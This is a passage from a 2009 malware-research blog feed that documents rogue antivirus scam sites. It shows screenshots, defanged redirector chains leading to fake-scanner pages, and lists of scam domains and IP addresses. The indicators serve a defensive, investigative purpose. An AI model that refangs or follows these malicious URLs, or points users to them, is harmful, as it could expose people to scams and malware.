/&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;So firstly, let's show you the home page of these sites:&lt;br /&gt;&lt;br /&gt;cleanerpcsolution.com&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdV7Wfpo1YI/AAAAAAAAAUQ/ZWvrFe-_vos/s1600-h/SCAM-cleanerpcsolution.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 194px; height: 320px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdV7Wfpo1YI/AAAAAAAAAUQ/ZWvrFe-_vos/s320/SCAM-cleanerpcsolution.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294161191589250" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;desktoprepairpackage.com&lt;br /&gt;pcsolutionshelp.com &lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdV7WhZinQI/AAAAAAAAAUY/ZmlBB1nRVR8/s1600-h/SCAM-desktoprepairpackage.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 294px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdV7WhZinQI/AAAAAAAAAUY/ZmlBB1nRVR8/s320/SCAM-desktoprepairpackage.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294161660943618" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;malwareremovingtool.com&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7W9snrHI/AAAAAAAAAUg/Ef47UWW7Ps8/s1600-h/SCAM-malwareremovingtool.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 306px; height: 320px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7W9snrHI/AAAAAAAAAUg/Ef47UWW7Ps8/s320/SCAM-malwareremovingtool.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294169257159794" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;pcantimalwaresolution.com &lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdV7XJUYA_I/AAAAAAAAAUo/BKJJoVlXuTw/s1600-h/SCAM-pcantimalwaresolution.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 309px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdV7XJUYA_I/AAAAAAAAAUo/BKJJoVlXuTw/s320/SCAM-pcantimalwaresolution.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294172376695794" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;removespywarethreats.com&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7XeNNjZI/AAAAAAAAAUw/sTmBkjNTaLI/s1600-h/SCAM-removespywarethreats.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 281px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7XeNNjZI/AAAAAAAAAUw/sTmBkjNTaLI/s320/SCAM-removespywarethreats.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294177983794578" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;securecleanersolution.com&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7b7A3CXI/AAAAAAAAAU4/pyk0w8egFm4/s1600-h/SCAM-securecleanersolution.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 305px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdV7b7A3CXI/AAAAAAAAAU4/pyk0w8egFm4/s320/SCAM-securecleanersolution.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320294254436092274" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;And now the collection of fake scanner with different template.&lt;br /&gt;&lt;br /&gt;http://removespywarethreats.com/2009/142/?a=&amp;amp;l=&amp;amp;f=&amp;amp;ex=&amp;amp;ed=&amp;amp;sub=pdt&amp;amp;prodabbr=USRM &lt;br /&gt;&lt;br /&gt;Redirectors:&lt;br /&gt;&lt;br /&gt;hxxp://evenmorestats.com/in.cgi (redirect to yahoo news)&lt;br /&gt;hxxp://evenmorestats.com/in.cgi?2 (redirect to google) &lt;br /&gt;&lt;br /&gt;hxxp://evenmorestats.com/in.cgi?3 (&lt;a href="http://wepawet.iseclab.org/view.php?hash=63d78e44a67726f8698b4da9286a3baf&amp;amp;t=1238565166&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;)&lt;br /&gt;redirect to: &lt;br /&gt;hxxp://securecleanersolution.com/2009/1001/?a=&amp;amp;l=&amp;amp;f=&amp;amp;sub=&amp;amp;prodabbr=3P_USEC&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTWl5wIH3I/AAAAAAAAARY/yiFzzOXcvzY/s1600-h/securecleanersolution.com-fake-scanner.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 309px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTWl5wIH3I/AAAAAAAAARY/yiFzzOXcvzY/s320/securecleanersolution.com-fake-scanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113006477582194" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://evenmorestats.com/in.cgi?4 (&lt;a href="http://wepawet.iseclab.org/view.php?hash=eb5aeb996e30b5ba22508a2395704622&amp;amp;t=1238565168&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;)&lt;br /&gt;redirect to: &lt;br /&gt;hxxp://spywareprotectiontool.com/2009/141/?a=&amp;amp;l=&amp;amp;f=&amp;amp;ex=&amp;amp;ed=&amp;amp;sub=csp&amp;amp;prodabbr=USRM&lt;br /&gt;&lt;br /&gt;hxxp://evenmorestats.com/in.cgi?6 (&lt;a href="http://wepawet.iseclab.org/view.php?hash=82d3d269a2d3245a5cf22299dfbdba76&amp;amp;t=1238565172&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;)&lt;br /&gt;redirect to: &lt;br /&gt;hxxp://securecleanersolution.com/2009/102/?a=&amp;amp;l=&amp;amp;f=&amp;amp;sub=&amp;amp;prodabbr=3P_USEC&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTW1QQGkUI/AAAAAAAAARg/CeyiMVKCisM/s1600-h/securecleanersolution.com-fake-scanner2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 277px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTW1QQGkUI/AAAAAAAAARg/CeyiMVKCisM/s320/securecleanersolution.com-fake-scanner2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113270215315778" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Other on the same site:&lt;br /&gt;&lt;br /&gt;hxxp://securecleanersolution.com/2009/101/?a=&amp;amp;l=&amp;amp;f=&amp;amp;sub=&amp;amp;prodabbr=3P_USEC&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTXeeI0KsI/AAAAAAAAARo/v0AJZE5H3Mw/s1600-h/securecleanersolution.com-fake-scanner3.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 282px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTXeeI0KsI/AAAAAAAAARo/v0AJZE5H3Mw/s320/securecleanersolution.com-fake-scanner3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113978317482690" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTXefesRBI/AAAAAAAAARw/Usi7-jq5Byk/s1600-h/securecleanersolution.com-fake-scanner4.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 279px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTXefesRBI/AAAAAAAAARw/Usi7-jq5Byk/s320/securecleanersolution.com-fake-scanner4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113978677675026" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://securecleanersolution.com/2009/103/?a=&amp;amp;l=&amp;amp;f=&amp;amp;sub=&amp;amp;prodabbr=3P_USEC&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTXeraNsXI/AAAAAAAAAR4/pe6CNFirOkA/s1600-h/securecleanersolution.com-fake-scanner5.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 310px; height: 320px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTXeraNsXI/AAAAAAAAAR4/pe6CNFirOkA/s320/securecleanersolution.com-fake-scanner5.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113981880119666" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://securecleanersolution.com/2009/104/?a=&amp;amp;l=&amp;amp;f=&amp;amp;sub=&amp;amp;prodabbr=3P_USEC&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdTXer7uw8I/AAAAAAAAASA/qaSNYzZo3ks/s1600-h/securecleanersolution.com-fake-scanner6.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 247px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdTXer7uw8I/AAAAAAAAASA/qaSNYzZo3ks/s320/securecleanersolution.com-fake-scanner6.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113982020699074" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://securecleanersolution.com/2009/105/?a=&amp;amp;l=&amp;amp;f=&amp;amp;sub=&amp;amp;prodabbr=3P_USEC&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTXeu512vI/AAAAAAAAASI/lQhZS-vDRl4/s1600-h/securecleanersolution.com-fake-scanner7.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 265px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTXeu512vI/AAAAAAAAASI/lQhZS-vDRl4/s320/securecleanersolution.com-fake-scanner7.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320113982818081522" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://securecleanersolution.com/2009/1000/?a=&amp;amp;l=&amp;amp;f=&amp;amp;sub=&amp;amp;prodabbr=3P_USEC&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTY79Uac8I/AAAAAAAAASQ/ISSavgrv288/s1600-h/securecleanersolution.com-fake-scanner14.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 181px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTY79Uac8I/AAAAAAAAASQ/ISSavgrv288/s320/securecleanersolution.com-fake-scanner14.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320115584415462338" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://securecleanersolution.com/2009/1002/?a=&amp;amp;l=&amp;amp;f=&amp;amp;sub=&amp;amp;prodabbr=3P_USEC&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTZUiX_VRI/AAAAAAAAASY/dffOInIDAjw/s1600-h/securecleanersolution.com-fake-scanner8.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 190px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTZUiX_VRI/AAAAAAAAASY/dffOInIDAjw/s320/securecleanersolution.com-fake-scanner8.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320116006679434514" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://evenmorestats.com/in.cgi?7 (&lt;a href="http://wepawet.iseclab.org/view.php?hash=69c58b0a65a3e2f9861f60225eaae754&amp;amp;t=1238565174&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;)&lt;br /&gt;redirect to: &lt;br /&gt;hxxp://advancesoftwaretool.com/2009/142/?a=&amp;amp;l=&amp;amp;f=&amp;amp;ex=&amp;amp;ed=&amp;amp;h=&amp;amp;sub=&amp;amp;prodabbr=3P_UVSM&lt;br /&gt;&lt;br /&gt;hxxp://evenmorestats.com/in.cgi?8&lt;br /&gt;redirect to: &lt;br /&gt;hxxp://goforuniq.com/in.cgi?9&amp;amp;gai=-o2z&amp;amp;gli=&amp;amp;gff=&lt;br /&gt;then&lt;br /&gt;hxxp://spywareprotectiontool.com/2009/142/?a=&amp;amp;l=&amp;amp;f=&amp;amp;ex=&amp;amp;ed=&amp;amp;sub=&amp;amp;prodabbr=USRM&lt;br /&gt;&lt;br /&gt;hxxp://evenmorestats.com/in.cgi?9&lt;br /&gt;redirect to: &lt;br /&gt;hxxp://goforuniq.com/in.cgi?9&amp;amp;gai=-o2z&amp;amp;gli=&amp;amp;gff=&lt;br /&gt;then&lt;br /&gt;hxxp://promotion-offer.com/srm/adv/142/?a=-o2z&amp;amp;l=&amp;amp;f=&amp;amp;ex=&amp;amp;ed=&amp;amp;sub=&amp;amp;prodabbr=USRM&lt;br /&gt;&lt;br /&gt;Other on the same site: promotion-offer.com [89.248.168.46]&lt;br /&gt;&lt;br /&gt;hxxp://promotion-offer.com/srm/adv/140/?a=-o2z&amp;amp;l=&amp;amp;f=&amp;amp;ex=&amp;amp;ed=&amp;amp;sub=&amp;amp;prodabbr=USRM&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTadHEnW7I/AAAAAAAAASw/o0kPhbpQm5c/s1600-h/promotion-offer.com-fake-scanner3.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 229px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTadHEnW7I/AAAAAAAAASw/o0kPhbpQm5c/s320/promotion-offer.com-fake-scanner3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320117253480864690" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTadV9RAPI/AAAAAAAAAS4/Mc1X0RwMiac/s1600-h/promotion-offer.com-fake-scanner4.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 233px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTadV9RAPI/AAAAAAAAAS4/Mc1X0RwMiac/s320/promotion-offer.com-fake-scanner4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320117257476571378" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://promotion-offer.com/srm/adv/141/?a=-o2z&amp;amp;l=&amp;amp;f=&amp;amp;ex=&amp;amp;ed=&amp;amp;sub=&amp;amp;prodabbr=USRM&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTacmucAxI/AAAAAAAAASg/MXmA4BRHtzI/s1600-h/promotion-offer.com-fake-scanner1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTacmucAxI/AAAAAAAAASg/MXmA4BRHtzI/s320/promotion-offer.com-fake-scanner1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320117244797911826" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTac69L-AI/AAAAAAAAASo/YblJPS-LMbQ/s1600-h/promotion-offer.com-fake-scanner2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTac69L-AI/AAAAAAAAASo/YblJPS-LMbQ/s320/promotion-offer.com-fake-scanner2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320117250228484098" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://promotion-offer.com/srm/adv/142/?a=-o2z&amp;amp;l=&amp;amp;f=&amp;amp;ex=&amp;amp;ed=&amp;amp;sub=&amp;amp;prodabbr=USRM &lt;br /&gt;&lt;br /&gt;Sometimes it redirect to another location &lt;br /&gt;hxxp://evenmorestats.com/in.cgi?9&lt;br /&gt;redirect to: &lt;br /&gt;hxxp://removespywarethreats.com/2009/142/?a=&amp;amp;l=&amp;amp;f=&amp;amp;ex=&amp;amp;ed=&amp;amp;sub=pdt&amp;amp;prodabbr=USRM &lt;br /&gt;(old template - no screenshot) &lt;br /&gt;or&lt;br /&gt;hxxp://pcantimalwaresolution.com/2009/141/&lt;br /&gt;hxxp://pcantimalwaresolution.com/2009/142/&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTfqXbyp-I/AAAAAAAAATA/u4eJG-lTAi8/s1600-h/pcantimalwaresolution.com-fake-scanner1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTfqXbyp-I/AAAAAAAAATA/u4eJG-lTAi8/s320/pcantimalwaresolution.com-fake-scanner1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320122978769479650" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTfqpL84kI/AAAAAAAAATI/pYjmmhZDYNA/s1600-h/pcantimalwaresolution.com-fake-scanner2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTfqpL84kI/AAAAAAAAATI/pYjmmhZDYNA/s320/pcantimalwaresolution.com-fake-scanner2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320122983534879298" /&gt;&lt;/a&gt; &lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdTfqXbyp-I/AAAAAAAAATA/u4eJG-lTAi8/s1600-h/pcantimalwaresolution.com-fake-scanner1.jpg"&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://desktoprepairpackage.com/2009/5?a=cspsant1p&amp;amp;l=273&lt;br /&gt;&amp;amp;f=cs_6247616163&amp;amp;ex=&amp;amp;ed=&amp;amp;h=&amp;amp;sub=&amp;amp;prodabbr=3P_UVSM&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTg-V4gFbI/AAAAAAAAATg/scl0ksvtOw8/s1600-h/desktopprepairpackage.com-fake-scanner1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 286px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTg-V4gFbI/AAAAAAAAATg/scl0ksvtOw8/s320/desktopprepairpackage.com-fake-scanner1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320124421462037938" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTg-jPAApI/AAAAAAAAATo/VrhBUqg9MNM/s1600-h/desktopprepairpackage.com-fake-scanner2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTg-jPAApI/AAAAAAAAATo/VrhBUqg9MNM/s320/desktopprepairpackage.com-fake-scanner2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320124425046065810" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://desktoprepairpackage.com/2009/142/  (old template - no screenshot)&lt;br /&gt;hxxp://desktoprepairpackage.com/2009/14/  (old template - no screenshot)&lt;br /&gt;&lt;br /&gt;hxxp://desktoprepairpackage.com/2009/2/?a=cspvm-sst&amp;amp;l=370&amp;amp;f=cs_4384615693&amp;amp;ex=1&amp;amp;ed=2&amp;amp;h=&amp;amp;sub=csp&amp;amp;prodabbr=3P_UVSM&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdThfZ7nQ3I/AAAAAAAAATw/j1ydVepXiRQ/s1600-h/desktopprepairpackage.com-fake-scanner5.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 284px; height: 320px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdThfZ7nQ3I/AAAAAAAAATw/j1ydVepXiRQ/s320/desktopprepairpackage.com-fake-scanner5.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320124989484516210" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdThfg5XoeI/AAAAAAAAAT4/1pT-njTNbNo/s1600-h/desktopprepairpackage.com-fake-scanner6.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdThfg5XoeI/AAAAAAAAAT4/1pT-njTNbNo/s320/desktopprepairpackage.com-fake-scanner6.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320124991354151394" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;hxxp://desktoprepairpackage.com/2009/142/?a=cspsni-sst&amp;amp;l=373&amp;amp;f=cs_7794016513&amp;amp;ex=1&amp;amp;ed=2&amp;amp;h=&amp;amp;sub=csp&amp;amp;prodabbr=3P_UVSM (old template - no screenshot)&lt;br /&gt;&lt;br /&gt;Other screenshot:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTi2ZNtFDI/AAAAAAAAAUA/agII9B0VuAo/s1600-h/removespywarethreats.com-fake-scanner1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 266px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdTi2ZNtFDI/AAAAAAAAAUA/agII9B0VuAo/s320/removespywarethreats.com-fake-scanner1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320126483940578354" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTi2he_xxI/AAAAAAAAAUI/RLL6BBOXo0M/s1600-h/removespywarethreats.com-fake-scanner2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 266px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdTi2he_xxI/AAAAAAAAAUI/RLL6BBOXo0M/s320/removespywarethreats.com-fake-scanner2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320126486160590610" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;Some interesting search on google for &amp;quot;Spyware.Wather.ic&amp;quot; and &amp;quot;Spyware.CreditCarder.y&amp;quot; also reveal:&lt;br /&gt;&lt;br /&gt;antispywareexpertplus.com&lt;br /&gt;antivirus-xp-pro-2009.com on 91.212.65.43&lt;br /&gt;antispywareexpert-plus.com &lt;br /&gt;asxp-2009.com&lt;br /&gt;as-xp-2009.com &lt;br /&gt;av-pro2009.com&lt;br /&gt;aviruspro2009.com &lt;br /&gt;homeav-2009.com on 94.75.253.92&lt;br /&gt;pc-virusremover2008.com &lt;br /&gt;pcsolutionshelp.com on 94.102.51.14&lt;br /&gt;powerfulvirusremover2008.com &lt;br /&gt;virusremover2008-offer.com &lt;br /&gt;virusremover-2008.com on 70.38.73.26&lt;br /&gt;xp-p-center.com &lt;br /&gt;xpas2009.com &lt;br /&gt;xppcenter.com&lt;br /&gt;xpprotcenter.com&lt;br /&gt;xp-protection-center.com&lt;br /&gt;xpsecuritycentral.com on  66.63.167.50&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdWiWyZqEeI/AAAAAAAAAVQ/yHxtN4AipRw/s1600-h/full-of-scam.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 114px; height: 400px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdWiWyZqEeI/AAAAAAAAAVQ/yHxtN4AipRw/s400/full-of-scam.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320337047178318306" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;and &lt;br /&gt;78.46.99.173  - &amp;quot;Hetzner Online AG&amp;quot;.  Looking on the google cache for this page reveal &lt;br /&gt;the common  email address: at @virusremover2008.com &lt;br /&gt;&lt;hr /&gt;Previous IP for virusremover-2008.com - 200.115.173.29  (Flagged on sorbs). Now 70.38.73.26&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdWiNREJdbI/AAAAAAAAAVI/Gr34H1DJH-I/s1600-h/virusremover-2008.com-200.115.173.29.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 75px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SdWiNREJdbI/AAAAAAAAAVI/Gr34H1DJH-I/s320/virusremover-2008.com-200.115.173.29.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320336883610908082" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt; Also quite interesting with 58.65.233.33 sharing IP for other name servers including ns1.removespywarethreats.com&lt;br /&gt;
 &lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdWl3aFSEJI/AAAAAAAAAVY/qOSYvRwetWc/s1600-h/ns1.removespywarethreats.com-58.65.233.33.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 129px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdWl3aFSEJI/AAAAAAAAAVY/qOSYvRwetWc/s320/ns1.removespywarethreats.com-58.65.233.33.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320340906120974482" /&gt;&lt;/a&gt;&lt;p&gt;&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-7486404152711641640?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/7486404152711641640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/7486404152711641640'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p4.html' title='Black Hat SEO and Rogue Antivirus p.4'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_9YOi_bjoDL4/SdV7Wfpo1YI/AAAAAAAAAUQ/ZWvrFe-_vos/s72-c/SCAM-cleanerpcsolution.com.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-2537836824437927482</id><published>2009-03-29T23:32:00.000-07:00</published><updated>2009-03-29T23:44:58.440-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='zlkon'/><category scheme='http://www.blogger.com/atom/ns#' term='AntivirusPlus'/><category scheme='http://www.blogger.com/atom/ns#' term='hack website rogue antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware campaign'/><category scheme='http://www.blogger.com/atom/ns#' term='AntivirusPlus ZlKon'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='massive attack'/><title type='text'>Black Hat SEO and Rogue Antivirus p.3</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="529" height="1516" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td colspan="2" valign="top" height="833"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO and Rogue Antivirus&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;AntivirusPlus ZlKon Malware drop - liveinternetmarketingltd.com&lt;br /&gt;&lt;/p&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" 